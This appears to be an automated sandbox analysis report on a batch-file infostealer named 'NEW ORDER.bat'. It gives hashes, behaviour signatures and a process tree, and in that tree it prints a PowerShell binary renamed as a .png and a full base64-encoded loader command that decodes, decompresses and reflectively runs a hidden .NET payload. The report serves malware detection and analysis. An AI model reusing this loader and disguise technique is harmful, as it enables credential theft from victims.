Analysis

  • max time kernel
    139s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2023 20:46

General

  • Target

    NEW ORDER.bat

  • Size

    1.7MB

  • MD5

    58e903258717babfa285cb145d13ae60

  • SHA1

    7598f7b9854c0877568e4eb7fda28dc95f923f04

  • SHA256

    39b9a7d0255606c4ac0405c4ddfc57d723cdb751079f688ca4e59308456e07d6

  • SHA512

    aa24af3753c228d96be063e2960c623a7704a58e44d1c7748380d2053dd2551ca0e327c7ac29a43ff77abf6493f4f27690ebe7046c6a7e13fb79339f407f047f

  • SSDEEP

    24576:Sfc0cF98NTiK3Tsl6cKbF85WaLAtWYTABeValPPm+WhtRGtuyngCUFBU6+Jwb7Z1:d4Y/3/YM9BACcUeb7aw

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
          PID:1824
        • C:\Windows\system32\xcopy.exe
          xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Evghmovs.png
          3⤵
            PID:4808
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:492
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.bat" C:\Users\Admin\AppData\Local\Temp\Evghmovs.png.bat
              3⤵
                PID:3344
              • C:\Users\Admin\AppData\Local\Temp\Evghmovs.png
                C:\Users\Admin\AppData\Local\Temp\Evghmovs.png -win 1 -enc JABOAHcAdQBkAHQAaAByAHYAcwBlACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAFcAbwBmAHYAawBmAGkAcAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHcAdQBkAHQAaAByAHYAcwBlACkAOwAkAFIAaAB5AG0AagBhAGoAbQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVwBvAGYAdgBrAGYAaQBwACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEwAcwBtAGsAdAB2AHAAawBrACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFIAaAB5AG0AagBhAGoAbQAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATABzAG0AawB0AHYAcABrAGsALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEwAcwBtAGsAdAB2AHAAawBrAC4AQwBsAG8AcwBlACgAKQA7ACQAUgBoAHkAbQBqAGEAagBtAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAVwBvAGYAdgBrAGYAaQBwACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAbwBmAHYAawBmAGkAcAApADsAIAAkAFcAdQB2AHQAbABlAHAAbABpAG0AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABXAG8AZgB2AGsAZgBpAHAAKQA7ACAAJABPAGgAagBjAGoAZgBmACAAPQAgACQAVwB1AHYAdABsAGUAcABsAGkAbQB0AC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQASgBrAGgAagBxACAAPQAgACQATwBoAGoAYwBqAGYAZgAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:4716

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Evghmovs.png

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Temp\Evghmovs.png.bat

            Filesize

            1.7MB

            MD5

            58e903258717babfa285cb145d13ae60

            SHA1

            7598f7b9854c0877568e4eb7fda28dc95f923f04

            SHA256

            39b9a7d0255606c4ac0405c4ddfc57d723cdb751079f688ca4e59308456e07d6

            SHA512

            aa24af3753c228d96be063e2960c623a7704a58e44d1c7748380d2053dd2551ca0e327c7ac29a43ff77abf6493f4f27690ebe7046c6a7e13fb79339f407f047f

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ralzai05.tgx.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4716-17-0x000002DB036D0000-0x000002DB036F2000-memory.dmp

            Filesize

            136KB

          • memory/4716-19-0x00007FFB67060000-0x00007FFB67B21000-memory.dmp

            Filesize

            10.8MB

          • memory/4716-21-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-20-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-22-0x000002DB1E170000-0x000002DB1E2CA000-memory.dmp

            Filesize

            1.4MB

          • memory/4716-23-0x000002DB1DEC0000-0x000002DB1DF3A000-memory.dmp

            Filesize

            488KB

          • memory/4716-24-0x000002DB1E410000-0x000002DB1E476000-memory.dmp

            Filesize

            408KB

          • memory/4716-25-0x000002DB1E470000-0x000002DB1E545000-memory.dmp

            Filesize

            852KB

          • memory/4716-26-0x000002DB1E620000-0x000002DB1E6F0000-memory.dmp

            Filesize

            832KB

          • memory/4716-27-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-28-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-29-0x000002DB1E6F0000-0x000002DB1E7F8000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-30-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-31-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-33-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-37-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-39-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-35-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-41-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-43-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-47-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-49-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-45-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-51-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-53-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-57-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-59-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-55-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-61-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-65-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-67-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-63-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-69-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-71-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-77-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-79-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-75-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-81-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-83-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-73-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-85-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-89-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-87-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-91-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-93-0x000002DB1E6F0000-0x000002DB1E7F4000-memory.dmp

            Filesize

            1.0MB

          • memory/4716-385-0x00007FFB67060000-0x00007FFB67B21000-memory.dmp

            Filesize

            10.8MB

          • memory/4716-388-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-812-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-919-0x000002DB03680000-0x000002DB03690000-memory.dmp

            Filesize

            64KB

          • memory/4716-2207-0x000002DB1E8A0000-0x000002DB1E8EC000-memory.dmp

            Filesize

            304KB

          • memory/4716-2206-0x000002DB1E800000-0x000002DB1E89E000-memory.dmp

            Filesize

            632KB

          • memory/4716-2208-0x000002DB1E8F0000-0x000002DB1E916000-memory.dmp

            Filesize

            152KB

          • memory/4716-2227-0x000002DB1E950000-0x000002DB1E9CA000-memory.dmp

            Filesize

            488KB

          • memory/4716-2256-0x00007FFB67060000-0x00007FFB67B21000-memory.dmp

            Filesize

            10.8MB